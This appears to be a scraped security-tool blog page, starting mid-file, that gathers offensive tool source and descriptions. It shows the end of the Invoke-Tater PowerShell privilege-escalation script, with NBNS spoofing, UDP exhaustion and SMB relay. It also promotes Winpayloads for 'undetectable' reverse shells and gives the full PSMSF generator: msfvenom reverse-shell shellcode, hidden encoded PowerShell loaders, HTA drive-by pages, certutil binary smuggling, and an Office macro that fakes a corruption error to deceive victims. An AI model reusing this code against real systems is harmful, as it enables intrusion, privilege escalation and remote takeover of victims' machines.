                + (0x43,0x6f,0x6e,0x74,0x65,0x6e,0x74,0x2d,0x4c,0x65,0x6e,0x67,0x74,0x68,0x3a,0x20,0x31,0x30,0x37,0x0d,0x0a)`
                + (0x53,0x65,0x72,0x76,0x65,0x72,0x3a,0x20,0x4d,0x69,0x63,0x72,0x6f,0x73,0x6f,0x66,0x74,0x2d,0x48,0x54,0x54,0x50,0x41,0x50,0x49,0x2f,0x32,0x2e,0x30,0x0d,0x0a)`
                + (0x44,0x61,0x74,0x65,0x3a)`
                + $HTTP_timestamp`
                + (0x0d,0x0a,0x0d,0x0a)`
        }
        
        $HTTP_stream.write($HTTP_response, 0, $HTTP_response.length)
        $HTTP_stream.Flush()
        start-sleep -s 1
        $tater.request_RawUrl_old = $tater.request_RawUrl
        $tater.HTTP_client_handle_old= $tater.HTTP_client.Client.Handle

    }

}

$exhaust_UDP_scriptblock = 
{
    $tater.exhaust_UDP_running = $true
    $tater.console_queue.add("$(Get-Date -format 's') - Trying to exhaust UDP source ports so DNS lookups will fail")
    $UDP_socket_list = New-Object "System.Collections.Generic.List[Net.Sockets.Socket]"
    $UDP_failed_ports_list = New-Object "System.Collections.Generic.List[Int]"

    $i=0
    for ($i = 0; $i -le 65535; $i++)
    {
        try
        {
            if ($i -ne 137 -and $i -ne 53)
            {
                $IP_end_point = New-Object System.Net.IPEndpoint([Net.IPAddress]::Any, $i)
                $UDP_socket = New-Object Net.Sockets.Socket( [Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Dgram,[Net.Sockets.ProtocolType]::Udp )
                $UDP_socket.Bind($IP_end_point)
                $UDP_socket_list.Add($UDP_socket)
            }
        }
        catch
        {
            $UDP_failed_ports_list.Add($i);
            $tater.console_queue.add("$(Get-Date -format 's') - Couldn't bind to UDP port $i")
        }
    }

    $tater.UDP_exhaust_success = $false

    while (!$tater.UDP_exhaust_success)
    {
        if(!$suppress_flush_message)
        {
            $tater.console_queue.add("$(Get-Date -format 's') - Flushing DNS resolver cache")
            $suppress_flush_message = $true
        }

        DnsFlushResolverCache

        try
        {
            $host_lookup = [System.Net.Dns]::GetHostEntry("microsoft.com")
        }
        catch
        {
            $tater.console_queue.add("$(Get-Date -format 's') - DNS lookup failed so UDP exhaustion worked")
            $tater.UDP_exhaust_success = $true
            break
        }

        $tater.console_queue.add("$(Get-Date -format 's') - DNS lookup succeeded so UDP exhaustion failed")

        foreach ($UDP_port in $UDP_failed_ports_list)
        {
            try
            {
                $IP_end_point = New-Object System.Net.IPEndpoint([Net.IPAddress]::Any, $i)
                $UDP_socket = New-Object Net.Sockets.Socket( [Net.Sockets.AddressFamily]::InterNetwork,[Net.Sockets.SocketType]::Dgram,[Net.Sockets.ProtocolType]::Udp )
                $UDP_socket.Bind($IP_end_point)
                $UDP_socket_list.Add($UDP_socket)
                $UDP_failed_ports.Remove($UDP_port)
            }
            catch
            {
                $tater.console_queue.add("$(Get-Date -format 's') - Failed to bind to $UDP_port during cleanup")
            }
        } 
    }

    $tater.exhaust_UDP_running = $false
}

$spoofer_scriptblock = 
{
    param ($IP,$SpooferIP,$Hostname,$NBNSLimit)

    $Hostname = $Hostname.ToUpper()

    [Byte[]]$hostname_bytes = (0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x43,0x41,0x41,0x41,0x00)

    $hostname_encoded = [System.Text.Encoding]::ASCII.GetBytes($Hostname)
    $hostname_encoded = [System.BitConverter]::ToString($hostname_encoded)
    $hostname_encoded = $hostname_encoded.Replace("-","")
    $hostname_encoded = [System.Text.Encoding]::ASCII.GetBytes($hostname_encoded)

    for ($i=0; $i -lt $hostname_encoded.Count; $i++)
    {
        if($hostname_encoded[$i] -gt 64)
        {
            $hostname_bytes[$i] = $hostname_encoded[$i] + 10
        }
        else
        {
            $hostname_bytes[$i] = $hostname_encoded[$i] + 17
        }
    }

    [Byte[]]$NBNS_response_packet = (0x00,0x00)`
        + (0x85,0x00,0x00,0x00,0x00,0x01,0x00,0x00,0x00,0x00,0x20)`
        + $hostname_bytes`
        + (0x00,0x20,0x00,0x01,0x00,0x00,0x00,0xa5,0x00,0x06,0x00,0x00)`
        + ([IPAddress][String]([IPAddress]$SpooferIP)).GetAddressBytes()`
        + (0x00,0x00,0x00,0x00)
      
    while($tater.exhaust_UDP_running)
    {
        Start-Sleep -s 2
    }

    $tater.console_queue.add("$(Get-Date -format 's') - Flushing DNS resolver cache")
    DnsFlushResolverCache

    $tater.console_queue.add("$(Get-Date -format 's') - Starting NBNS spoofer to resolve $Hostname to $SpooferIP")
              
    $send_socket = New-Object System.Net.Sockets.UdpClient(137)
    $destination_IP = [system.net.IPAddress]::Parse($IP)
    $destination_point = New-Object Net.IPEndpoint($destination_IP,137)
    $send_socket.Connect($destination_point)
       
    while ($tater.running)
    {
        :NBNS_spoofer_loop while (!$tater.hostname_spoof -and $tater.running)
        {
            for ($i = 0; $i -lt 255; $i++)
            {
                for ($j = 0; $j -lt 255; $j++)
                {
                    $NBNS_response_packet[0] = $i
                    $NBNS_response_packet[1] = $j                 
                    [void]$send_socket.send( $NBNS_response_packet,$NBNS_response_packet.length)

                    if($tater.hostname_spoof -and $NBNSLimit -eq 'Y')
                    {
                        break NBNS_spoofer_loop
                    }
                }
            }
        }

        Start-Sleep -m 5
    }

    $send_socket.Close()
 }

$tater_scriptblock = 
{
    param ($NBNS,$NBNSLimit,$RunTime,$SpooferIP,$Hostname,$HTTPPort)
    
    Function HTTPListenerStop
    {
        $tater.console_queue.add("$(Get-Date -format 's') - Attempting to stop HTTP listener")
        $tater.HTTP_client.Close()
        start-sleep -s 1
        $tater.HTTP_listener.server.blocking = $false
        Start-Sleep -s 1
        $tater.HTTP_listener.server.Close()
        Start-Sleep -s 1
        $tater.HTTP_listener.Stop()
        $tater.running = $false
    }

    if($RunTime)
    {    
        $tater_timeout = new-timespan -Minutes $RunTime
        $tater_stopwatch = [diagnostics.stopwatch]::StartNew()
    }

    while ($tater.running)
    {
        if($tater.trigger -ne 2)
        {
            try
            {
                $Hostname_IP = [System.Net.Dns]::GetHostEntry($Hostname).AddressList[0].IPAddressToString
            }
            catch{}
            
            if($Hostname_IP -eq $SpooferIP)
            {
                if(!$suppress_spoofed_message)
                {
                    $tater.console_queue.add("$(Get-Date -format 's') - $Hostname has been spoofed to $SpooferIP")
                    $suppress_spoofed_message = $true
                }

                if($NBNSLimit -eq 'y')
                {
                    $tater.hostname_spoof = $true
                }

                $hostname_spoof = $true
                $Hostname_IP = ""
            }
            elseif((!$Hostname_IP -or $Hostname_IP -ne $SpooferIP) -and $NBNS -eq 'y')
            {
                $tater.hostname_spoof = $false
                $hostname_spoof = $false
            }
        }

        if(!$tater.SMBRelay_success -and $tater.trigger -eq 1)
        {
            if(Test-Path "C:\Program Files\Windows Defender\MpCmdRun.exe")
            {
                if(($process_defender.HasExited -or !$process_defender) -and !$tater.SMB_relay_success -and $hostname_spoof)
                {
                    $tater.console_queue.add("$(Get-Date -format 's') - Running Windows Defender signature update")
                    $process_defender = Start-Process -FilePath "C:\Program Files\Windows Defender\MpCmdRun.exe" -Argument SignatureUpdate -WindowStyle Hidden -passthru
                }
            }
            else
            {
                $tater.console_queue.add("Windows Defender not found")
            }
        }
        elseif(!$tater.SMBRelay_success -and $tater.trigger -eq 2)
        {
            $service_webclient = Get-Service WebClient

            if($service_webclient.Status -eq 'Stopped')
            {
                $tater.console_queue.add("$(Get-Date -format 's') - Starting WebClient service")
                $process_webclient = Start-Process -FilePath "cmd.exe" -Argument "/C pushd \\live.sysinternals.com\tools" -WindowStyle Hidden -passthru -Wait
            }

            if($service_webclient.Status -eq 'Running' -and !$scheduled_task_added -and !$tater.SMBRelay_success)
            {
                $timestamp_add = (Get-Date).AddMinutes(1)
                $timestamp_add_string = $timestamp_add.ToString("HH:mm")
                $tater.console_queue.add("$(Get-Date -format 's') - Adding scheduled task " + $tater.taskname)
                $process_scheduled_task = "/C schtasks.exe /Create /TN " + $tater.taskname + " /TR  \\127.0.0.1@$HTTPPort\test /SC ONCE /ST $timestamp_add_string /F"
                Start-Process -FilePath "cmd.exe" -Argument $process_scheduled_task -WindowStyle Hidden -passthru -Wait
                
                $schedule_service = new-object -com("Schedule.Service")
                $schedule_service.connect() 
                $scheduled_task_list = $schedule_service.getfolder("\").gettasks(1)

                $scheduled_task_added = $false

                foreach($scheduled_task in $scheduled_task_list)
                {
                    if($scheduled_task.name -eq $tater.taskname)
                    {
                        $scheduled_task_added = $true
                    }
                }

                $schedule_service.Quit()

                if(!$scheduled_task_added -and !$tater.SMBRelay_success)
                {
                    $tater.console_queue.add("$(Get-Date -format 's') - Adding scheduled task " + $tater.taskname + " failed")
                    HTTPListenerStop
                }
            }
            elseif($scheduled_task_added -and (Get-Date) -ge $timestamp_add.AddMinutes(2))
            {
                $tater.console_queue.add("$(Get-Date -format 's') - Something went wrong with the service")
                HTTPListenerStop
            }
        }

        if($tater.SMBRelay_success)
        {
            Stop-Process -id $process_defender.Id
        }

        if($RunTime)
        {
            if($tater_stopwatch.elapsed -ge $tater_timeout)
            {
                HTTPListenerStop
            }
        } 
           
        Start-Sleep -m 5
    }
 }

# HTTP/HTTPS Listener Startup Function 
Function HTTPListener()
{
    if($WPADPort -eq '80')
    {
        $tater.HTTP_endpoint = New-Object System.Net.IPEndPoint([ipaddress]::loopback,$HTTPPort)
    }
    else
    {
        $tater.HTTP_endpoint = New-Object System.Net.IPEndPoint([ipaddress]::any,$HTTPPort)
    }

    $tater.HTTP_listener = New-Object System.Net.Sockets.TcpListener $tater.HTTP_endpoint
    $tater.HTTP_listener.Start()
    $HTTP_runspace = [runspacefactory]::CreateRunspace()
    $HTTP_runspace.Open()
    $HTTP_runspace.SessionStateProxy.SetVariable('tater',$tater)
    $HTTP_powershell = [powershell]::Create()
    $HTTP_powershell.Runspace = $HTTP_runspace
    $HTTP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
    $HTTP_powershell.AddScript($SMB_relay_challenge_scriptblock) > $null
    $HTTP_powershell.AddScript($SMB_relay_response_scriptblock) > $null
    $HTTP_powershell.AddScript($SMB_relay_execute_scriptblock) > $null
    $HTTP_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
    $HTTP_powershell.AddScript($HTTP_scriptblock).AddArgument($Command).AddArgument($HTTPPort).AddArgument($WPADDirectHosts).AddArgument($WPADPort) > $null
    $HTTP_handle = $HTTP_powershell.BeginInvoke()
}

# Exhaust UDP Startup Function
Function ExhaustUDP()
{
    $exhaust_UDP_runspace = [runspacefactory]::CreateRunspace()
    $exhaust_UDP_runspace.Open()
    $exhaust_UDP_runspace.SessionStateProxy.SetVariable('tater',$tater)
    $exhaust_UDP_powershell = [powershell]::Create()
    $exhaust_UDP_powershell.Runspace = $exhaust_UDP_runspace
    $exhaust_UDP_powershell.AddScript($shared_basic_functions_scriptblock) > $null
    $exhaust_UDP_powershell.AddScript($exhaust_UDP_scriptblock) > $null
    $exhaust_UDP_handle = $exhaust_UDP_powershell.BeginInvoke()
}

# Spoofer Startup Function
Function Spoofer()
{
    $spoofer_runspace = [runspacefactory]::CreateRunspace()
    $spoofer_runspace.Open()
    $spoofer_runspace.SessionStateProxy.SetVariable('tater',$tater)
    $spoofer_powershell = [powershell]::Create()
    $spoofer_powershell.Runspace = $spoofer_runspace
    $spoofer_powershell.AddScript($shared_basic_functions_scriptblock) > $null
    $spoofer_powershell.AddScript($SMB_NTLM_functions_scriptblock) > $null
    $spoofer_powershell.AddScript($spoofer_scriptblock).AddArgument($IP).AddArgument($SpooferIP).AddArgument($Hostname).AddArgument($NBNSLimit) > $null
    $spoofer_handle = $spoofer_powershell.BeginInvoke()
}

# Tater Loop Function
Function TaterLoop()
{
    $tater_runspace = [runspacefactory]::CreateRunspace()
    $tater_runspace.Open()
    $tater_runspace.SessionStateProxy.SetVariable('tater',$tater)
    $tater_powershell = [powershell]::Create()
    $tater_powershell.Runspace = $tater_runspace
    $tater_powershell.AddScript($tater_scriptblock).AddArgument($NBNS).AddArgument($NBNSLimit).AddArgument($RunTime).AddArgument($SpooferIP).AddArgument($Hostname).AddArgument($HTTPPort) > $null
    $tater_handle = $tater_powershell.BeginInvoke()
}

# HTTP Server Start
HTTPListener

# Exhaust UDP Start
if($ExhaustUDP -eq 'y')
{
    ExhaustUDP
}

# Spoofer Start
if($NBNS -eq 'y')
{
    Spoofer
}

# Tater Loop Start
TaterLoop

if($tater.console_output)
{

    :console_loop while($tater.running -and $tater.console_output)
    {
        while($tater.console_queue.Count -gt 0)
        {
            write-output($tater.console_queue[0] + $tater.newline)
            $tater.console_queue.RemoveRange(0,1)
        }

        if($tater.console_input)
        {
            if([console]::KeyAvailable)
            {
                $tater.console_output = $false
                BREAK console_loop
            }
        }

        Start-Sleep -m 5
    }
}

if(!$tater.running)
{
    if($tater.SMBRelay_success)
    {  
        if($trigger -eq 2)
        {
            Write-Output "$(Get-Date -format 's') - Remove scheduled task $Taskname manually when finished"
        }

        Write-Output "$(Get-Date -format 's') - Tater was successful and has exited"
    }
    else
    {
        Write-Output "$(Get-Date -format 's') - Tater was not successful and has exited"
    }

    Remove-Variable tater -scope global
}

}
#End Invoke-Tater

Function Stop-Tater
{
    <#
    .SYNOPSIS
    Stop-Tater will stop Tater before a successful privilege escalation.
    #>
    if($tater)
    {
        if($tater.running)
        {
            $tater.status_queue.add("$(Get-Date -format 's') - Attempting to stop HTTP listener")|Out-Null
            $tater.HTTP_listener.server.blocking = $false
            Start-Sleep -s 1
            $tater.HTTP_listener.server.Close()
            Start-Sleep -s 1
            $tater.HTTP_listener.Stop()
            $tater.running = $false
            $tater.status_queue.add("$(Get-Date -format 's') - Tater has been stopped")|Out-Null
            Remove-Variable tater -scope global
        }
        else
        {
            $tater.status_queue.add("Tater isn't running") | Out-Null
        }
    }
    else
    {
        $tater.status_queue.add("Tater isn't running")|Out-Null
    }

    if($tater.status_output)
    {
        while($tater.status_queue.Count -gt 0)
        {
            write-output($tater.status_queue[0] + $tater.newline)
            $tater.status_queue.RemoveRange(0,1)
        }
    }
} 

Function Get-Tater
{
    <#
    .SYNOPSIS
    Get-Tater will display queued Tater output.
    #>
    while($tater.console_queue.Count -gt 0)
    {
        write-output($tater.console_queue[0] + $tater.newline)
        $tater.console_queue.RemoveRange(0,1)
    }
}

Source : https://github.com/Kevin-Robertson | Our Post Before

changelog 16/2/2016:
+ setup.sh : Forcing and installing python2.7
+ winpayloads.py : Fixed bug with custom port and uac.

Winpayloads is a Undetectable Windows Payload Generation.
with option menu:
[1] Windows Reverse Shell(Stageless) [Shellter]
[2] Windows Reverse Meterpreter(Staged) [Shellter, UacBypass, Priv Esc Checks]
[3] Windows Bind Meterpreter(Staged) [Shellter, UacBypass, Priv Esc Checks]
[4] Windows Reverse Meterpreter(Raw Shellcode) [Base64 Encode]
[5] Windows Reverse Meterpreter(Registry Persistence) [Shellter]

Installation :

git clone https://github.com/Charliedean/Winpayloads
cd WinPayloads
./setup.sh
./WinPayloads.py

Updates:
cd Winpayloads
git pull origin master

Source : https://github.com/Charliedean | Our Post Before

Penetration test database for penetration testing provides common dictionary attack payload, webshell, etc., and include commonly used scripts.
With Feature:
1. Common script
Project python scripts provide helpful penetration auxiliary functions, the root directory pen.py script entry.
1.1. Dictionary database maintenance
1.2. Trojan generated image
1.3. mail account verification
1.4. Blasting mail account
1.5. CMS Recognition
1.6. generated password dictionary
1.7. URI blasting
1.8. Coding
1.9. decoding
1.10. Exploit function
pen.py the exploit sub-command provides exploit related operations, comprising:
– Search exploit information
– Add, delete, modify, exploit information
– Perform an exploit
– Search and batch execution exploit

2. user-passwd dictionary
password directory that contains the password dictionary file, user directory contains the user dictionary file name.
3. dns dictionary
4. directory dictionary
5. attack-payload
6. webshell
7. script
8. exploit

Dependency:
pip install requests
pip install chardet

Installation:

git clone https://github.com/alpha1e0/pentestdb.git && cd pentestdb
python pen.py

Source:https://github.com/alpha1e0

CJExploiter is drag and drop ClickJacking exploit development assistance tool. First open the “index.html” with your browser locally and enter target URL and click on “View Site”. You can dynamically create your own inputs. Finally by click the “Exploit It” you can see the P0C.

CJExploiter

Summary:
Clickjacking, also known as a “UI redress attack”, is when an attacker uses multiple transparent or opaque layers to trick a user into clicking on a button or link on another page when they were intending to click on the the top level page. Thus, the attacker is “hijacking” clicks meant for their page and routing them to another page, most likely owned by another application, domain, or both.
Using a similar technique, keystrokes can also be hijacked. With a carefully crafted combination of stylesheets, iframes, and text boxes, a user can be led to believe they are typing in the password to their email or bank account, but are instead typing into an invisible frame controlled by the attacker. OWASP

Download : 1.0.0.zip  | 1.0.0.tar.gz
Source : https://github.com/enddo

what’s new in 2016, Latest Change 20/2/2016:
+ New Features:
— Patch Command: The patch command allows to easily bypass a call or syscall.
— heap command: heap command provides information on the heap chunk specified as argument.
— xinfo/vmmap/xfiles commands: xinfo, vmmap and xfiles display a comprehensive and human-friendly memory mapping of either the process or a specific location.
— Remote debugging: It is possible to use gef in a remote debugging environment.
— set-permission command: This command was added to facilitate the exploitation process, by changing the permission rights on a specific page directly from the debugger.
— unicorn command: If you have installed [unicorn](http://unicorn-engine.org) emulation engine and its Python bindings, gef integrates a new command to emulate instructions
— trace-run command: The trace-run is meant to be provide a visual appreciation directly in IDA disassembler of the path taken by a specific execution. It should be used with
+ added documentation for trace-run
+ Update gef.sh

GEF is aimed to be used mostly by exploiters and reverse-engineers. It provides additional features to GDB using the Python API to assist during the process of dynamic analysis or exploit development.

GEF – GDB Enhanced Features.

GEF fully relies on GDB API and other Linux specific source of information (such as /proc/pid). As a consequence, some of the features might not work on custom or harden systems such as GrSec. It has fully support for Python2 and Python3 indifferently (as more and more distro start pushing gdb compiled with Python3 support).
GEF supports all the architecture supported by GDB :
– x86
– ARM
– MIPS
– PowerPC

Tested on
* x86-32/x86-64 (even though you should totally use gdb-peda (https://github.com/longld/peda) instead)
* armv6/armv7/armv8 (untested)
* mips32
* powerpc32/powerpc64
* sparc

# Tested on gdb 7.x / python 2.6 & 2.7 & 3.x
# To start: in gdb, type `source /path/to/gef.py

Install GEF:
Setup from repository
The best way to use GEF is through cloning the git repository from GitHub, and source the file from your ~/.gdbinit.
$ git clone https://github.com/hugsy/gef.git # or git pull to update
$ echo ‘source /path/to/gef.py’ >> ~/.gdbinit

One-time setup script
If you only need GEF for a one-time environment (VMs, etc.) that do not have/need git installed, just go with:
$ curl -s -L https://github.com/hugsy/gef/raw/master/gef.sh | sh

Optional dependancies
A few commands were added to GEF to extend its possibilities. It is recommended to install the following modules:
+ capstone highly recommended https://github.com/aquynh/capstone
+ ROPgadget highly recommended https://github.com/JonathanSalwan/ROPgadget
+ python-radare2 https://github.com/radare/radare2-bindings

Download : Master.zip  | Clone URL
Source : https://github.com/hugsy | Our Post Before

Notice: Just For educational purpose only!
PSMSF can help us generate payload or files used in cmd console/browser/.. with Metasploit-Framework. If you are similar to windows cmd console, you can use the results in different areas.

powershell attack

psmsf has three attack types:
+

:  Translate a binary file into a text certification file, and restore the cert file to a binary file on target machines.
+ cert attack:  Generate metasploit console script / macro.
+ hta attack: Generate HTA html page. When victims access HTA page, os will be attacked from Internet Explorer.

helper command

Usage:

makesure metasploit framework has been install on your Unix/Linux Platform system.
git clone https://github.com/all3g/psmsf && cd psmsf
pyton psmsf.py

Script:

#!/usr/bin/python
# -*- coding: utf-8 -*-

# Please Install Metasploit-Framework first,
# Kali Linux:       apt-get install metasploit-framework
# Notice:           Just For edutional purpose
# License:          BSD License

import logging
import subprocess
import base64
import re
import os
import sys
from optparse import OptionParser
from optparse import OptionGroup
from optparse import OptionError


logging.basicConfig(level=logging.INFO, format="[+] %(message)16s")


def write_file(filename, data):
    """Write data into file"""
    with open(filename, 'w') as f:
        f.write(data)


def read_file(filename):
    """Read data from file"""
    with open(filename, "rb") as f:
        data = f.read()
    return data


def execute_command(command):
    """Execute OS Command"""
    logging.debug("Executes command: %s" % command)
    proc = subprocess.Popen(command,
                            stdout=subprocess.PIPE,
                            stderr=subprocess.PIPE,
                            shell=True)
    data = proc.communicate()[0]
    return data


def extract_msf_shellcode(shellcode):
    """Filter some bad chars in shellcode"""
    replaces = {';': '',
                ' ': '',
                '+': '',
                '"': '',
                '\n': '',
                'buf=': '',
                'Found 0 compatible encoders': '',
                'unsignedcharbuf[]=': ''}
    for key, value in replaces.iteritems():
        shellcode = shellcode.replace(key, value)

    shellcode = shellcode.rstrip()
    return shellcode


def generate_msf_shellcode(payload, host, port):
    """generate shellcode: \x00\x00\x00...."""
    logging.debug("Metasploit Framework generates shellcode")
    command = ("msfvenom "
               "-p %s "
               "LHOST=%s "
               "LPORT=%s "
               "StagerURILength=5 "
               "StagerVerifySSLCert=false "
               "-e x86/shikata_ga_nai "
               "-a x86 "
               "--platform windows "
               "--smallest "
               "-f c") % (payload, host, port)
    shellcode = execute_command(command)

    return extract_msf_shellcode(shellcode)


def generate_powershell_script(shellcode):
    shellcode = ("$1 = '$c = ''"
                 "[DllImport(\"kernel32.dll\")]"
                 "public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect);"
                 "[DllImport(\"kernel32.dll\")]"
                 "public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId);"
                 "[DllImport(\"msvcrt.dll\")]"
                 "public static extern IntPtr memset(IntPtr dest, uint src, uint count);"
                 "'';"
                 "$w = Add-Type -memberDefinition $c -Name \"Win32\" -namespace Win32Functions -passthru;"
                 "[Byte[]];[Byte[]]"
                 "$z = %s;"
                 "$g = 0x1000;"
                 "if ($z.Length -gt 0x1000){$g = $z.Length};"
                 "$x=$w::VirtualAlloc(0,0x1000,$g,0x40);"
                 "for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]($x.ToInt32()+$i), $z[$i], 1)};"
                 "$w::CreateThread(0,0,$x,0,0,0);"
                 "for (;;){Start-sleep 60};';"
                 "$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));"
                 "$2 = \"-enc \";"
                 "if([IntPtr]::Size -eq 8){$3 = $env:SystemRoot + \"\syswow64\WindowsPowerShell\\v1.0\powershell\";iex \"& $3 $2 $e\"}else{;iex \"& powershell $2 $e\";}" % shellcode)

    return shellcode


def generate_powershell_command(shellcode):
    shellcode = base64.b64encode(shellcode.encode('utf_16_le'))
    return "powershell -window hidden -enc %s" % shellcode


def generate_powershell_attack(payload, host, port):
    """generate shellcode: 0x00,0x00,0x00,..."""
    shellcode = generate_msf_shellcode(payload, host, port)
    shellcode = re.sub("\\\\x", "0x", shellcode)

    counter = 0
    floater = ""
    newdata = ""

    for line in shellcode:
        floater += line
        counter += 1
        if counter == 4:
            newdata = newdata + floater + ","
            floater = ""
            counter = 0

    shellcode = newdata[:-1]
    shellcode = generate_powershell_script(shellcode)
    powershell_cmd = generate_powershell_command(shellcode)

    msfcommand = ("use exploit/multi/handler\n"
                  "set payload %s\n"
                  "set LHOST %s\n"
                  "set LPORT %s\n"
                  "set ExitOnSession false\n"
                  "set EnableStageEncoding true\n"
                  "exploit -j\n") % (payload, host, port)

    ps_dirname = "powershell_attack"
    ps_msf_filename = "powershell_msf.rc"
    ps_script_filename = "powershell_hacking.bat"

    if not os.path.isdir(ps_dirname): os.makedirs(ps_dirname)
    logging.info('create msfconsole resource script')
    write_file("%s/%s" % (ps_dirname, ps_msf_filename), msfcommand)

    logging.info('create powershell shellcode command')
    write_file("%s/%s" % (ps_dirname, ps_script_filename), powershell_cmd)

    return powershell_cmd, msfcommand


def generate_cert_attack(filename):
    if not os.path.isfile(filename):
        logging.info("Please set a file for cert attack")
        sys.exit()

    crt_dirname = "cert_attack"
    crt_encode_filename = "cert_encode.crt"
    crt_decode_filename = "cert_decode.bat"

    crt_encode_filepath = "%s/%s" % (crt_dirname, crt_encode_filename)
    if not os.path.isdir(crt_dirname): os.makedirs(crt_dirname)
    if os.path.isfile(crt_encode_filepath): os.remove(crt_encode_filepath)

    # Translate a binary file to coreutil prep format.
    data = read_file(filename)
    data = base64.b64encode(data)
    data = ("-----BEGIN CERTIFICATE-----\n"
            "%s\n"
            "-----END CERTIFICATE-----" % data)
    logging.info('encode a binary file to a cert file')
    write_file(crt_encode_filepath, data)

    # Create a windows batch decode script (.bat)
    crt_decode_script_filepath = "%s/%s" % (crt_dirname, crt_decode_filename)
    data = "certutil -decode %s encoded.exe" % crt_encode_filename
    logging.info('create a windows batch script for decode')
    write_file(crt_decode_script_filepath, data)



def generate_hta_attack(command):
    hta_module = "module.hta"
    hta_index = "index.html"
    hta_dirname = "windows_hta_attack"

    hta_module_code = ("<script>\n"
            "a=new ActiveXObject(\"WScript.Shell\");\n"
            "a.run('%%windir%%\\\\System32\\\\cmd.exe /c %s', 0);"
            "window.close();\n</script>" % command)

    hta_index_code = ("<iframe "
            "id=\"frame\" "
            "src=\"%s\" "
            "application=\"yes\" "
            "width=0 height=0 style=\"hidden\" "
            "frameborder=0 marginheight=0 "
            "marginwidth=0 scrolling=no></iframe>" % hta_module)

    if not os.path.isdir(hta_dirname): os.makedirs(hta_dirname)

    logging.info('create hta index file')
    write_file("%s/%s" % (hta_dirname, hta_index), hta_index_code)

    logging.info('create hta module file')
    write_file("%s/%s" % (hta_dirname, hta_module), hta_module_code)

    return hta_index_code, hta_module_code


def generate_macro_attack(shellcode, line_length=300):
    data = ""
    cmd_list = [shellcode[i: i+line_length] for i in range(0, len(shellcode), line_length)]
    for line in cmd_list:
        data += "& \"" + line + "\" _\n"

    data = data[:4]
    data = data.replace("&", "", 1)

    macro = ("Sub Auto_Open()\n"
             "Dim x\n"
             "x = \"%s\"\n"
             "Shell (\"POWERSHELL.EXE \" & x)\n"
             "Dim title As String\n"
             "title = \"Critical Microsoft Office Error\"\n"
             "Dim msg As String\n"
             "Dim intResponse As Integer\n"
             "msg = \"This document appears to be corrupt or missing critical "
             "rows in order to restore. Please restore this file from a backup.\"\n"
             "intResponse = MsgBox(msg, 16, title)\n"
             "Application.Quit\n"
             "End Sub" % shellcode)

    logging.info("\n%s" % macro)
    return macro


def powershell_attack_help():
    doc = ("Everything is now generated in two files, ex:\n"
           "    powershell_hacking.bat - shellcode can be executed in cmd console.\n"
           "                           - Usage: cmd.exe /c powershell_hacking.bat\n"
           "    powershell_msf.rc      - msfconsole resource script.\n"
           "                           - Usage: msfconsole -r powershell_msf.rc\n")
    logging.info(doc)
    logging.info("python psmsf.py --attacktype ps --payload windows/shell/reverse_tcp --lhost 192.168.1.100 --lport 8443")
    logging.info("python psmsf.py --attacktype ps --payload windows/meterpreter/reverse_tcp --lhost 192.168.1.100 --lport 8443")
    logging.info("python psmsf.py --attacktype ps --payload windows/meterpreter/reverse_http --lhost 192.168.1.100 --lport 8443")


def cert_attack_help():
    doc = ("The certutil attack vector was identified by Matthew Graeber (@mattifestation) "
           "which allows you to take a binary file, move it into a base64 format and "
           "use certutil on the victim machine to convert it back to a binary for you. "
           "This should work on virtually any system and allow you to transfer a binary "
           "to the victim machine through a fake certificate file. To use this attack, ")
    logging.info(doc)
    logging.info("python psmsf.py --attacktype crt --filename demo.exe")


def hta_attack_help():
    doc = ("The HTA attack will automatically generate two files, ex:\n"
           "    index.html             - redirects browsers to use module.hta\n"
           "    module.hta             - contains the malicious code\n"
           "                           - Usage: http://x.x.x.x/winodows_hta/index.html"
    )
    logging.info(doc)
    logging.info("python psmsf.py --attacktype hta whoami")


def macro_attack_help():
    doc = ("The Macro attack will automatically generate a new macro, and call it. "
           "Auto_Open and paste the generated code into that. This will automatically"
           "run. Note that a message will prompt to the user saying that the file is "
           "corrupt and automatically close the excel document. THIS IS NORMAL BEHAVIOR!"
           "This is tricking the victim to thinking the excel document is corrupted."
           "You should get a shell through powershell injection after that."
    )
    logging.info(doc)
    logging.info("python psmsf.py --attacktype mac --payload windows/shell/reverse_tcp --lhost 192.168.1.100 --lport 8443")
    logging.info("python psmsf.py --attacktype mac --payload windows/meterpreter/reverse_tcp --lhost 192.168.1.100 --lport 8443")
    logging.info("python psmsf.py --attacktype mac --payload windows/meterpreter/reverse_http --lhost 192.168.1.100 --lport 8443")


def banner():
    banner = """
     ######
      #     #  ####  #    #  ####  ######
       #     # #      ##  ## #      #
        ######   ####  # ## #  ####  #####
         #            # #    #      # #
          #       #    # #    # #    # #
           #        ####  #    #  ####  #
    """

    logging.info(banner)
    return banner


def help():
    usage = "python %prog [options]"
    parser = OptionParser(usage=usage)

    try:
        parser.add_option('--attacktype', dest='attacktype', help='Attack Types are supported. (ps, crt, hta, mac)')

        powershell_opts = OptionGroup(parser, "Powershell/Macro Attack", "Generate metasploit console script / macro")
        powershell_opts.add_option('--payload', dest='payload', type='str', help='payload of metasploit framework')
        powershell_opts.add_option('--lhost', dest='lhost', type='str', help='lhost for payload of metasploit framework')
        powershell_opts.add_option('--lport', dest='lport', type='int', help='lport for payload of metasploit framework')
        parser.add_option_group(powershell_opts)

        crt_opts = OptionGroup(parser, "CERT Attack", "Translate a binary file into a text certification file, and restore the cert file to a binary file on target machines")
        crt_opts.add_option('--filename', dest='filename', type='str', help='file to be encoded to a certification')
        parser.add_option_group(crt_opts)

        hta_opts = OptionGroup(parser, "HTA Attack", "Generate HTA html page. When victims access HTA page, os will be attacked from Internet Explorer")
        hta_opts.add_option('--command', dest='command', type='str', help='command of attack mode')
        parser.add_option_group(hta_opts)

        (args, _) = parser.parse_args()
    except (OptionError, TypeError) as e:
        parser.error(e)
    else:
        return args


if __name__ == "__main__":
    args = help()
